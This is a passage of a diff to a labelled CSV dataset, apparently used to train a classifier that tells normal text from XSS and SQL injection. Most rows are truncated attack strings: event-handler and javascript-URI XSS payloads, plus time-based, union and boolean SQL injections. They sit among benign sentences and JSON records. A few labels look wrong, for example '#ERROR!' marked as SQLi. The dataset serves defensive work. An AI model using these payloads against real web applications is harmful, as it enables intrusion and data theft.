onload=alert(1)></data>,1,XSS,2544 -"<font onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,4624 -1' ) and 8514 = ( select count ( * ) from domain.d,2,SQLi,13316 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10468 -1 and 3754 = ( select upper ( xmltype ( chr ( 60 ),2,SQLi,15992 -You can select anywhere from five minutes to an ho,0,normal,25082 -"<bdo onkeypress=""alert(1)"" contenteditable>test</b",1,XSS,8613 +Fortnite servers are really bad today/tonight. Bee,0,normal,26501 +`'><script>\xE2\x80\x80javascript:alert(530)</scri,1,XSS,8976 +Select reset.,0,normal,24624 +Join for lunch.,0,normal,23011 +-8080' ) ) order by 1#,2,SQLi,22026 +"<ul ondblclick=""alert(1)"">test</ul>",1,XSS,5384 +"-1707 ) or 1570 = convert ( int, ( select char ( 1",2,SQLi,20477 +<base onpointerover=alert(1)>XSS</base>,1,XSS,5461 +1 ) ) waitfor delay '0:0:5'--,2,SQLi,20427 +The best thing I have found it to select pieces of,0,normal,25481 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10737 +1 ) union all select null#,2,SQLi,21154 +"<script onmouseout=""alert(1)"">test</script>",1,XSS,6950 +"1"" ) or 8156 = ( select count ( * ) from generate_",2,SQLi,22009 +"-2849' union all select 6491,6491,6491,6491,6491,6",2,SQLi,17439 +[a](javascript:window.onerror=confirm;throw%201),1,XSS,9434 +"1"" and 9468 = 7105--",2,SQLi,17149 +"elt ( 5098 = 2728,1 )",2,SQLi,16556 +Let's find out where the jazz concert is.,0,normal,23829 +"<article draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,1797 +"1%"" and 8635 = ( select count ( * ) from generate_",2,SQLi,19906 +He also edited Gregory Lewis Way's translation of ,0,normal,26125 +"&lt;A HREF=\""http&#58;//google&#46;com/\""&gt;XSS&l",1,XSS,1059 +0 or 1=1,2,SQLi,10159 +"<ul onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,7690 +"<meter onmouseout=""alert(1)"">test</meter>",1,XSS,2631 +1 ) ) ) and 9660 = ( select count ( * ) from all_u,2,SQLi,15449 +"<style>@keyframes x{}</style><area style=""animatio",1,XSS,2733 +<svg id=x onfocus=alert(1)>,1,XSS,4819 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,22381 +%27%20or%201=1,2,SQLi,10162 +<style>@keyframes slidein {}</style><summary style,1,XSS,5649 +Select the best photographer.,0,normal,24360 +select * from users where id = 1 % ( 1 ) or 1 = 1 ,2,SQLi,11936 +1' ) as kbja where 4275 = 4275 and ( select 2* ( i,2,SQLi,17204 +Select the perfect wedding jewelry.,0,normal,24388 +"<style></style\x0D<img src=""about:blank"" onerror=j",1,XSS,446 +Where is the database file?,0,normal,23458 +<style>:target {transform: rotate(180deg);}</style,1,XSS,8916 +"<rt draggable=""true"" ondragend=""alert(1)"">test</rt",1,XSS,4803 +"-3442' in boolean mode ) union all select 6255,625",2,SQLi,17431 +<h1 onpointerenter=alert(1)>XSS</h1>,1,XSS,2545 +<menuitem onpointerenter=alert(1)>XSS</menuitem>,1,XSS,4626 +1' ) as wpmv where 1479 = 1479 and 3754 = ( select,2,SQLi,18718 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10470 +"1' where 4334 = 4334 or elt ( 5873 = 5873,sleep ( ",2,SQLi,15984 +1 or sleep ( 5 ),2,SQLi,16028 +<small id=x tabindex=1 onfocusin=alert(1)></small>,1,XSS,8615 "<META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://",1,XSS,285 "&lt;TABLE BACKGROUND=\""javascript&#058;alert('XSS'",1,XSS,999 -"1"" where 9618 = 9618 and ( 3020 = 3020 ) *6703--",2,SQLi,14919 -"<blockquote draggable=""true"" ondragstart=""alert(1)",1,XSS,5021 -Select your talk.,0,normal,24907 -"1%' and row ( 6237,7469 ) > ( select count ( * ) ,",2,SQLi,17285 -<s onpointerdown=alert(1)>XSS</s>,1,XSS,7362 -"-5957 ) ) ) union all select 8485,8485,8485,8485,8",2,SQLi,19483 -1' ) where 2090 = 2090,2,SQLi,15214 -To select multiple files on Windows 10 from a fold,0,normal,25244 -<blockquote onblur=alert(1) tabindex=1 id=x></bloc,1,XSS,4769 -<hr id=x tabindex=1 ondeactivate=alert(1)></hr><in,1,XSS,4282 -"<frameset oncontextmenu=""alert(1)"">test</frameset>",1,XSS,7200 -"{""id"":null,""firstName"":""James"",""lastName"":""Poh"",""s",0,normal,26919 -"<title onmouseover=""alert(1)"">test</title>",1,XSS,4534 -"To change the format, go to your Memories, select ",0,normal,25280 -Select the perfect match.,0,normal,24327 -"""We'd say, 'Why didn't you select Indy?' and they ",0,normal,26445 -"<mark onkeyup=""alert(1)"" contenteditable>test</mar",1,XSS,7531 -"1"" ) ) ) rlike sleep ( 5 ) and ( ( ( ""qcqx"" like """,2,SQLi,17495 -<blockquote onpointerleave=alert(1)>XSS</blockquot,1,XSS,7041 -"<a href=""javascript:alert(1)"">ssss</a>",1,XSS,9749 -"<command onbeforecut=""alert(1)"" contenteditable>te",1,XSS,8470 -<style>:target {color: red;}</style><dfn id=x styl,1,XSS,3662 -"-8347%' ) union all select 7643,7643,7643--",2,SQLi,22288 -<bgsound onfocusout=alert(1) tabindex=1 id=x></bgs,1,XSS,8353 -"<style>@keyframes slidein {}</style><abbr style=""a",1,XSS,5427 -"<details draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,2380 --1150' ) as hdby where 4032 = 4032 union all selec,2,SQLi,17466 -Where's the spa?,0,normal,23613 +select case when 4176 = 6138 then 1 else null end-,2,SQLi,14398 +"<body oncopy=""alert(1)"" contenteditable>test</body",1,XSS,5023 +Select your conversation.,0,normal,24904 +1%' ) ) or 9643 = ( select count ( * ) from domain,2,SQLi,13716 +<var id=x tabindex=1 ondeactivate=alert(1)></var><,1,XSS,7364 +"-4121%"" ) union all select 2659,2659,2659,2659,265",2,SQLi,19481 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,15206 +Today it's available as an optional topping at sel,0,normal,25241 +"<rtc onkeyup=""alert(1)"" contenteditable>test</rtc>",1,XSS,4771 +"<meter onmouseover=""alert(1)"">test</meter>",1,XSS,4284 +"<pre onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,7202 +1' ) where 8252 = 8252 or 8514 = benchmark ( 50000,2,SQLi,21971 +"<area onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,4536 +"To create a bookmark for the current solution, sel",0,normal,25277 +1' ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 1,2,SQLi,15094 +"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,16643 +<svg><element onload=alert(1)></element>,1,XSS,7533 +1'|| ( select 'wqmz' where 6400 = 6400 and row ( 6,2,SQLi,14254 +"<object draggable=""true"" ondrag=""alert(1)"">test</o",1,XSS,7043 +<%script>alert(‘XSS’)<%/script>,1,XSS,9751 +<style>:target {transform: rotate(180deg);}</style,1,XSS,8472 +<h1 onpointerdown=alert(1)>XSS</h1>,1,XSS,3664 +"1"" or char ( 117 ) ||char ( 111 ) ||char ( 105 ) |",2,SQLi,19701 +"<pre onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,8355 +<menu onpointerover=alert(1)>XSS</menu>,1,XSS,5429 +<marquee onpointerenter=alert(1)>XSS</marquee>,1,XSS,2381 +1,0,normal,26694 +"-1663' or elt ( 1032 = 1032,3623 ) and 'yqaj' like",2,SQLi,15366 "<img src=x onerror=\x00""javascript:alert(1)"">",1,XSS,683 "<style><img title=""</style><img src onerror=alert(",1,XSS,112 -They can't select where these features populate on,0,normal,25314 -"<datalist onpaste=""alert(1)"" contenteditable>test<",1,XSS,8343 -<style>:target {transform: rotate(180deg);}</style,1,XSS,7325 -1'|| ( select 'zpwe' from dual where 7743 = 7743 u,2,SQLi,13142 -"1"" ) ) ) and 3202 = like ( 'abcdefg',upper ( hex (",2,SQLi,17117 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3412 -They are often habitual readers and they typically,0,normal,25318 -<blockquote id=x tabindex=1 onbeforedeactivate=ale,1,XSS,3978 -I'll select a gift for my friend's birthday.,0,normal,23717 -"<rp onkeydown=""alert(1)"" contenteditable>test</rp>",1,XSS,4404 -"<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""tex",1,XSS,7394 -&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;,1,XSS,1375 -1 ) ) as hrks where 7637 = 7637 or elt ( 6272 = 62,2,SQLi,18697 -"-7845' union all select 9574,9574,9574,9574,9574,9",2,SQLi,14079 -"1"" ) procedure analyse ( extractvalue ( 5840,conca",2,SQLi,18597 -"{""id"":null,""name"":""MetalGarurumon""}",0,normal,27157 -Select a workout that suits your goals.,0,normal,24089 -<style>:target {color: red;}</style><em id=x style,1,XSS,4316 -"{""id"":null,""firstName"":""Fook Weng"",""lastName"":""Ow ",0,normal,27205 -"-1678"" where 3706 = 3706 or 5023 = ctxsys.drithsx.",2,SQLi,17522 -"-3710 ) ) union all select 5770,5770,5770,5770,577",2,SQLi,18050 -"1' ) ) ) and 8148 = like ( 'abcdefg',upper ( hex (",2,SQLi,12703 -<form onblur=alert(1) tabindex=1 id=x></form><inpu,1,XSS,2662 -"1"" ) ) ) and ( select * from ( select ( sleep ( 5 ",2,SQLi,21746 -<area onpointerdown=alert(1)>XSS</area>,1,XSS,5703 -1 ) ) as cbdx where 8998 = 8998 and elt ( 4249 = 4,2,SQLi,13981 -"<listing onmousemove=""alert(1)"">test</listing>",1,XSS,7021 -#ERROR!,2,SQLi,11000 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,20785 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,13001 -"<address draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,3789 -1' or exp ( ~ ( select * from ( select concat ( 0x,2,SQLi,17879 -Select cuisine.,0,normal,24535 -<svg><animate onbegin=alert() attributeName=x></sv,1,XSS,9469 -select * from users where id = 1 or $ 1 = 1 or 1 =,2,SQLi,11903 -"<ol ondblclick=""alert(1)"">test</ol>",1,XSS,6260 -"{""id"":null,""firstName"":""Meena"",""lastName"":""Melanie",0,normal,27070 -<svg><thead onload=alert(1)></thead>,1,XSS,7600 -"1"" union all select null#",2,SQLi,20218 -"1"" where 2989 = 2989 or 8421 = ( select count ( * ",2,SQLi,15443 -"-5169"" ) ) union all select 6198,6198,6198,6198--",2,SQLi,20274 -<pre onblur=alert(1) tabindex=1 id=x></pre><input ,1,XSS,5943 -"-2855"" ) ) ) union all select 1496,1496,1496,1496#",2,SQLi,21397 -Since you're using object-specific overprint optio,0,normal,25544 --9263' ) as qodg where 6798 = 6798 or 5023 = ctxsy,2,SQLi,21696 -1%' ) ) and 3707 = ( select count ( * ) from sysib,2,SQLi,17706 -Select a song to set the mood.,0,normal,24206 +They did not conduct any bidding to select the und,0,normal,25311 +"<noembed draggable=""true"" ondragleave=""alert(1)"">t",1,XSS,8345 +"<xmp draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,7327 +"1"" ) ) as uycc where 4364 = 4364 and char ( 107 ) ",2,SQLi,13135 +"1"" ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( ",2,SQLi,17115 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3414 +"{""id"":null,""name"":""definition""}",0,normal,27032 +"<script onmouseleave=""alert(1)"">test</script>",1,XSS,3980 +"1%"" ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99",2,SQLi,22115 +"<mark onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,4406 +<style>@keyframes slidein {}</style><nextid style=,1,XSS,7396 +&lt;DIV STYLE=&quot;background-image: url(javascri,1,XSS,1376 +1' ) where 9175 = 9175,2,SQLi,13445 +"{""id"":null,""firstName"":""Khairul"",""lastName"":""Asyra",0,normal,27035 +1'|| ( select 'tjzy' where 3037 = 3037,2,SQLi,18992 +"1"" or 7417 = ( select count ( * ) from sysibm.syst",2,SQLi,18329 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,19774 +"<ol oncopy=""alert(1)"" contenteditable>test</ol>",1,XSS,4318 +Select a workout that challenges you.,0,normal,24002 +1'+ ( select zpns where 6922 = 6922 and ( select 9,2,SQLi,16295 +Where's the cat?,0,normal,23477 +Select refuse.,0,normal,24580 +"<frame ondblclick=""alert(1)"">test</frame>",1,XSS,2663 +1' ) and 4386 = utl_inaddr.get_host_address ( chr ,2,SQLi,19944 +"<optgroup oncut=""alert(1)"" contenteditable>test</o",1,XSS,5705 +"-9295 ) ) ) or 1570 = convert ( int, ( select char",2,SQLi,12379 +x000003C,1,XSS,7023 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,11002 +"-9762 ) or elt ( 5773 = 8986,8986 )",2,SQLi,20783 +1%' or 2633 = dbms_pipe.receive_message ( chr ( 11,2,SQLi,12212 +"<dfn onmouseout=""alert(1)"">test</dfn>",1,XSS,3791 +-4538' ) ) ) or 3260 = 1236 and ( ( ( 'hpnd' like ,2,SQLi,15760 +"-7749"" or ( 2689 = 7481 ) *7481",2,SQLi,20303 +"<img src=1 onerror=""s=document.createElement('scri",1,XSS,9471 +1' where 8099 = 8099,2,SQLi,14363 +"<isindex draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,6262 +1' where 1628 = 1628,2,SQLi,18338 +"<IMG SRC=""`<javascript:alert>`('')""",1,XSS,7602 +1 ) where 7571 = 7571 and char ( 109 ) ||char ( 79,2,SQLi,17105 +"1"" ) ) and ( 1248 = 8705 ) *8705 and ( ( ""wvma"" li",2,SQLi,15939 +1%' ) ) and exp ( ~ ( select * from ( select conca,2,SQLi,20272 +<video id=x tabindex=1 ondeactivate=alert(1)></vid,1,XSS,5945 +1,0,normal,26680 +1' in boolean mode ) and 9254 = ( select count ( *,2,SQLi,17426 +"1"" ) where 9545 = 9545 and 9198 = 9198--",2,SQLi,21694 +1%' ) ( select ( case when ( 4587 = 4587 ) then re,2,SQLi,12405 +1 ) as zqxa where 5718 = 5718 and 3580 = ( select ,2,SQLi,17760 "<! foo=""[[[Inception]]""><x foo=""]foo><script>javas",1,XSS,649 -"-8117' union all select 9945,9945,9945,9945,9945,9",2,SQLi,16192 -1' in boolean mode ) procedure analyse ( extractva,2,SQLi,17614 -"<td draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,7335 -Where's the database hosted?,0,normal,23383 -1 ) as mnyy where 4409 = 4409 union all select nul,2,SQLi,15542 -<font id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,6221 -"1"" ) where 7957 = 7957 and 3202 = like ( 'abcdefg'",2,SQLi,19666 -1' and ( select 2* ( if ( ( select * from ( select,2,SQLi,16984 -"Customers can also select ""Mx."" in lieu of Ms., Mr",0,normal,26256 -if ( 6767 = 5022 ) select 6767 else drop function ,2,SQLi,20677 -Select a color scheme for the website.,0,normal,24151 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10432 -"<menuitem onbeforecopy=""alert(1)"" contenteditable>",1,XSS,3652 -(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--,2,SQLi,11150 -Select courier.,0,normal,24703 -"<frame onmouseover=""alert(1)"">test</frame>",1,XSS,7412 -"<command onbeforepaste=""alert(1)"" contenteditable>",1,XSS,3685 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10633 -1'|| ( select 'ptfi' from dual where 2234 = 2234 a,2,SQLi,20800 -"1"" ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694",2,SQLi,16480 -"-9977"" where 5132 = 5132 union all select 5132--",2,SQLi,20649 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2482 --2909'|| ( select 'qfeq' where 7062 = 7062 union a,2,SQLi,22022 -"1%"" ) or 6979 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,15096 -"<var onmouseenter=""alert(1)"">test</var>",1,XSS,6904 -Can you help me decide where to visit?,0,normal,23920 -Select your adjust.,0,normal,25039 -<svg><element onload=alert(1)></element>,1,XSS,7533 -"-6122"" ) union all select 6578,6578--",2,SQLi,14588 -<D3/OnpOinTeReENter=confirm``>click here,1,XSS,9048 -"1"" where 5236 = 5236 or char ( 68 ) ||char ( 69 ) ",2,SQLi,21656 -1 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char,2,SQLi,14530 -"<;IMG SRC="";livescript:[code]"";>;",1,XSS,1603 -"1"" ) as dlfq where 8410 = 8410",2,SQLi,18613 --5211 union all select 1754--,2,SQLi,15835 -") AND ELT(1337=1337,SLEEP(5)) AND ('1337' LIKE '13",2,SQLi,11251 -"1%"" ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( ""%"" ",2,SQLi,19049 -"<summary draggable=""true"" ondragleave=""alert(1)"">t",1,XSS,3476 -Select a cozy chair.,0,normal,22754 -1' ) ) as uncy where 8009 = 8009 union all select ,2,SQLi,20515 -mod,0,normal,23223 -"-1988 where 4597 = 4597 union all select 4597,4597",2,SQLi,22002 -1'+ ( select oljg where 2006 = 2006 and 3754 = ( s,2,SQLi,16791 -"{""id"":null,""firstName"":""Lee"",""lastName"":""Shaun"",""s",0,normal,26872 -"1"" rlike ( select * from ( select ( sleep ( 5 ) ) ",2,SQLi,19707 -"<q onpaste=""alert(1)"" contenteditable>test</q>",1,XSS,7122 -1' ) as zdhq where 5586 = 5586,2,SQLi,19550 -1' ) ) as fjbe where 4662 = 4662 or 2367 = ( selec,2,SQLi,17864 -Don't forget to select rugs and carpet that emit l,0,normal,26233 -1 and 6510 = ( select count ( * ) from sysusers as,2,SQLi,15054 -Select fall.,0,normal,24672 -<s onpointermove=alert(1)>XSS</s>,1,XSS,7069 +"-8327 where 7555 = 7555 or 1570 = convert ( int, (",2,SQLi,16184 +"-2067"" or 3038 = 3038",2,SQLi,17612 +"<table onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,7337 +1 ) as pyjx where 9005 = 9005,2,SQLi,17142 +"-6496"" ) ) ) or 1471 = 5278 and ( ( ( ""zkoj"" = ""zk",2,SQLi,15817 +<nextid onpointerenter=alert(1)>XSS</nextid>,1,XSS,6223 +Plant flowers.,0,normal,23025 +-1816%' ) ) ) union all select 2072--,2,SQLi,16982 +Select next.,0,normal,24487 +"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,20630 +1 ) as kqas where 7302 = 7302 and 8407 = ( select ,2,SQLi,18145 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10434 +<var id=x tabindex=1 onfocus=alert(1)></var>,1,XSS,3654 +(select(0)from(select(sleep(5)))v)%2f'+(select(0)f,2,SQLi,11152 +"1"" ) where 6821 = 6821 waitfor delay '0:0:5'--",2,SQLi,17029 +"<select oncut=""alert(1)"" contenteditable>test</sel",1,XSS,7414 +"<section onbeforepaste=""alert(1)"" contenteditable>",1,XSS,3687 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10635 +"1"" ) ) as upvg where 4826 = 4826",2,SQLi,20798 +1' in boolean mode ) or ( select * from ( select (,2,SQLi,18482 +You must select.,0,normal,24451 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2483 +1 ) and 6510 = ( select count ( * ) from sysusers ,2,SQLi,18442 +select sleep ( 5 ) and ( ( ( 'rzjf' = 'rzjf,2,SQLi,15088 +<spacer onpointermove=alert(1)>XSS</spacer>,1,XSS,6906 +"-3541"" or make_set ( 9354 = 9354,7185 ) and ""fgxu""",2,SQLi,17749 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,14103 +"<thead onpaste=""alert(1)"" contenteditable>test</th",1,XSS,7535 +1' ) ) ) and exp ( ~ ( select * from ( select conc,2,SQLi,14581 +"<LAYER SRC=""http://ha.ckers.org/scriptlet.html""></",1,XSS,9050 +-1643' where 1968 = 1968 or 3484 = 6642,2,SQLi,21654 "-1874"" ) as wgpj where 6481 = 6481 or 3629 = 3459",2,SQLi,22189 -Select the ideal lighting for your room.,0,normal,24210 -"-4960 union all select 4031,4031#",2,SQLi,14205 -( select ( case when ( 9066 = 5598 ) then 1 else 9,2,SQLi,20257 -"<section onmouseout=""alert(1)"">test</section>",1,XSS,4776 -"<address onkeydown=""alert(1)"" contenteditable>test",1,XSS,8823 -or (EXISTS),2,SQLi,10114 -<optgroup onpointerup=alert(1)>XSS</optgroup>,1,XSS,8500 -"1' ) ) union all select null,null,null,null,null,n",2,SQLi,18763 +"<;META HTTP-EQUIV="";refresh""; CONTENT="";0;url=java",1,XSS,1604 +"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,18611 +"1%"" ) ) ) or row ( 1045,7562 ) > ( select count ( ",2,SQLi,15827 +"))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE",2,SQLi,11253 +"1"" ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ",2,SQLi,19047 +<style>:target {color: red;}</style><legend id=x s,1,XSS,3478 +Filter calls.,0,normal,23024 +"1"" ) as saqy where 9704 = 9704 ( select ( case whe",2,SQLi,13198 +"1"" ) where 9359 = 9359 or 2367 = ( select count ( ",2,SQLi,18192 +"1' ) union all select null,null,null--",2,SQLi,22000 +1%' ) ) or ( select * from ( select ( sleep ( 5 ) ,2,SQLi,16789 +"{""id"":null,""firstName"":""Yan Feng"",""lastName"":""Yee""",0,normal,26869 +Select a topic for a blog post.,0,normal,24083 +"<param oncontextmenu=""alert(1)"">test</param>",1,XSS,7124 +1'+ ( select vupb where 9575 = 9575 union all sele,2,SQLi,19548 +"-7996"" ) ) or 4747 = dbms_utility.sqlid_to_sqlhash",2,SQLi,17862 +1' ) ) ) or ( select * from ( select ( sleep ( 5 ),2,SQLi,16761 +select sleep ( 5 ) and ( ( 'ilcv' = 'ilcv,2,SQLi,15047 +Select win.,0,normal,24669 +<b id=x tabindex=1 onactivate=alert(1)></b>,1,XSS,7071 +"1' ) ) procedure analyse ( extractvalue ( 5840,con",2,SQLi,22173 +Select the right colors for the design.,0,normal,24207 +"1"" ) where 2152 = 2152",2,SQLi,18839 +1' ) where 8948 = 8948 and 8635 = ( select count (,2,SQLi,20255 +"<basefont oncontextmenu=""alert(1)"">test</basefont>",1,XSS,4778 +"<nextid oncopy=""alert(1)"" contenteditable>test</ne",1,XSS,8825 +%20$(sleep%2050),2,SQLi,10116 +<style>@keyframes slidein {}</style><acronym style,1,XSS,8502 +"-3632' or make_set ( 9354 = 9354,7185 ) and 'lgpy'",2,SQLi,18761 "<a onpaste=""alert(1)"" contenteditable>test</a>",1,XSS,85 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10499 -1 where 5311 = 5311 rlike ( select * from ( select,2,SQLi,18423 -"<pre oncontextmenu=""alert(1)"">test</pre>",1,XSS,3852 --1236'+ ( select 'fbgh' where 3896 = 3896 union al,2,SQLi,13460 -"select * from users where id = 1 or 1#""; = 1 union",2,SQLi,11466 -Insert the new batteries into the device.,0,normal,22966 -"-9856"" union all select 9753--",2,SQLi,21484 -1'|| ( select 'vixv' from dual where 7704 = 7704 u,2,SQLi,15271 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10433 -"1"" ) where 2764 = 2764 rlike ( select ( case when ",2,SQLi,13364 -<embed onpointerup=alert(1)>XSS</embed>,1,XSS,3608 -AND 1=utl_inaddr.get_host_address((SELECT COUNT(DI,2,SQLi,11076 -1 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||cha,2,SQLi,21993 -"<basefont onmouseup=""alert(1)"">test</basefont>",1,XSS,6154 -Select your slip.,0,normal,25021 -</script><script>alert(1)</script>,1,XSS,1321 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,19917 -A party initiating proceedings could select any Br,0,normal,26435 --5062 ) where 7457 = 7457 or 4144 = ( select upper,2,SQLi,20159 -1 ) ) as quap where 7625 = 7625,2,SQLi,13023 -"<sup onkeypress=""alert(1)"" contenteditable>test</s",1,XSS,5381 -"<html ondblclick=""alert(1)"">test</html>",1,XSS,5818 -1' where 6795 = 6795 and 8635 = ( select count ( *,2,SQLi,12671 -1'|| ( select 'bmyt' from dual where 9407 = 9407 o,2,SQLi,22126 -<style>:target {color: red;}</style><applet id=x s,1,XSS,6116 -1 and 8514 = ( select count ( * ) from domain.doma,2,SQLi,19543 -<style>:target {color:red;}</style><abbr id=x styl,1,XSS,8361 -"-5243"" where 2105 = 2105 or 4144 = ( select upper ",2,SQLi,12268 -1' ) ) as vdhw where 8858 = 8858 order by 1#,2,SQLi,14218 -"><script>alert(String.fromCharCode(66, 108, 65, 99",1,XSS,1144 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8487 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10501 +"1"" ) ) as eagr where 3366 = 3366 and elt ( 4249 = ",2,SQLi,18421 +<element onpointerover=alert(1)>XSS</element>,1,XSS,3854 +Specify criteria where required.,0,normal,23267 +select * from users where id = 1 +$+. or 1 = 1 -- ,2,SQLi,11459 +1 ) where 7096 = 7096,2,SQLi,15434 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,21482 +1' ) ) and 4242 = 5831 and ( ( 'xflh' like 'xflh,2,SQLi,15263 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10435 +"In Egypt, Uber also offers UberX, Select and Scoot",0,normal,26011 +"<param draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,3610 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11078 +It is merely necessary to select some larger or sm,0,normal,25963 +<mark onpointerout=alert(1)>XSS</mark>,1,XSS,6156 +Select your fall.,0,normal,25018 +"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(XSS"")",1,XSS,1322 +1'|| ( select 'kzkr' from dual where 2778 = 2778,2,SQLi,19915 +A register address select line 91 provides a contr,0,normal,26432 +"-2790%"" ) union all select 5070,5070#",2,SQLi,20157 +select,0,normal,26576 +<slot onpointerleave=alert(1)>XSS</slot>,1,XSS,5383 +"<style>@keyframes x{}</style><td style=""animation-",1,XSS,5820 +"-8868"" ) where 5681 = 5681 union all select 5681,5",2,SQLi,13357 +-4961' ) or 3038 = 3038,2,SQLi,18030 +"<header onkeyup=""alert(1)"" contenteditable>test</h",1,XSS,6118 +"1' ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( ",2,SQLi,19264 +"<style>@keyframes x{}</style><meta style=""animatio",1,XSS,8363 +"{""id"":null,""firstName"":""Muthamil Selvi"",""lastName""",0,normal,26956 +"1"" ) ) ) or 7427 = dbms_pipe.receive_message ( chr",2,SQLi,13907 +<video src=1 onerror=alert(1)>,1,XSS,1145 +<input3 onpointerdown=alert(1)>XSS</input3>,1,XSS,8489 "`""'><img src=xxx:x \x0Conerror=javascript:alert(1)",1,XSS,552 -Please unban pubg and ignore the lame excuses of P,0,normal,26485 -Select your sign.,0,normal,24898 -"<style>@keyframes x{}</style><article style=""anima",1,XSS,8591 -"{""id"":null,""firstName"":""May"",""lastName"":""Lem"",""spe",0,normal,26905 -"<basefont onbeforepaste=""alert(1)"" contenteditable",1,XSS,2804 -"&lt;SCRIPT a=\""&gt;'&gt;\"" SRC=\""http&#58;//ha&#46",1,XSS,1047 +-8409 ) ) as ipbz where 9984 = 9984 or 3371 = 3869,2,SQLi,14037 +"1%"" union all select null,null,null,null,null,null",2,SQLi,20946 +<tbody onpointerdown=alert(1)>XSS</tbody>,1,XSS,8593 +"{""id"":null,""firstName"":""Tao"",""lastName"":""Ming"",""ad",0,normal,26902 +"<style>@keyframes x{}</style><col style=""animation",1,XSS,2805 +"&lt;SCRIPT&gt;document&#46;write(\""&lt;SCRI\"");&lt",1,XSS,1048 "<svg><a xlink:href=""javascript:alert(1)""><text x=""",1,XSS,150 -<data onpointerout=alert(1)>XSS</data>,1,XSS,3070 -"""><iframe src=""javascript:alert()"">",1,XSS,8685 +"<q draggable=""true"" ondragend=""alert(1)"">test</q>",1,XSS,3071 +"<s draggable=""true"" ondragend=""alert(1)"">test</s>",1,XSS,8687 <audio controls autoplay onratechange=alert(1)><so,1,XSS,95 -<cite id=x tabindex=1 onfocus=alert(1)></cite>,1,XSS,7626 -"1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ",2,SQLi,16994 -"1%"" ) and 6510 = ( select count ( * ) from sysuser",2,SQLi,16583 +<command id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,7628 +1 ) ) ) or 2367 = ( select count ( * ) from rdb$fi,2,SQLi,16992 +"1%"" and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ",2,SQLi,13557 "<div/onmouseover='alert(1)'> style=""x:"">",1,XSS,915 -><script+src=https://ads.yap.yahoo.com/nosdk/wj/v1,1,XSS,9794 -Where did you find it?,0,normal,23478 -1%' ) ) ) and 3707 = ( select count ( * ) from sys,2,SQLi,19442 -"1 ) ) and make_set ( 8554 = 3286,3286 ) and ( ( 73",2,SQLi,15632 -1' ) ) ) union all select null#,2,SQLi,19968 -1script3document.vulnerable=true;1/script3,1,XSS,1497 -"At the top right, select the name of your account.",0,normal,26340 -"Select cuts fell $1.37 to $227.70, based on USDA d",0,normal,25632 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,14251 -"<header onmousedown=""alert(1)"">test</header>",1,XSS,4886 -"UNION SELECT 